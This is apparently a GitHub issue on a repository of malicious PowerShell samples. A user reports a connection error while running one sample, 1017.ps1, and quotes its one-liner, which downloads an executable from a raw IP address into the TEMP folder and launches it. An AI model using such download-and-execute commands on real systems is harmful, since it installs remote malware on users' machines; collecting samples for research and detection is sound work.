"Unable to connect to the remote server" error #2

Thank you for the great repo.

I am currently getting a "Unable to connect to the remote server" error while trying to run malicious-powershell scripts like 1017.ps1 ((New-Object System.Net.WebClient).DownloadFile('http://185.45.193.17/update.exe',"$env:TEMP\updatex86.exe");Start-Process;Start-Process) ("$env:TEMP\updatex86.exe"))

In case I can get some help on this, I'd greatly appreciate it.
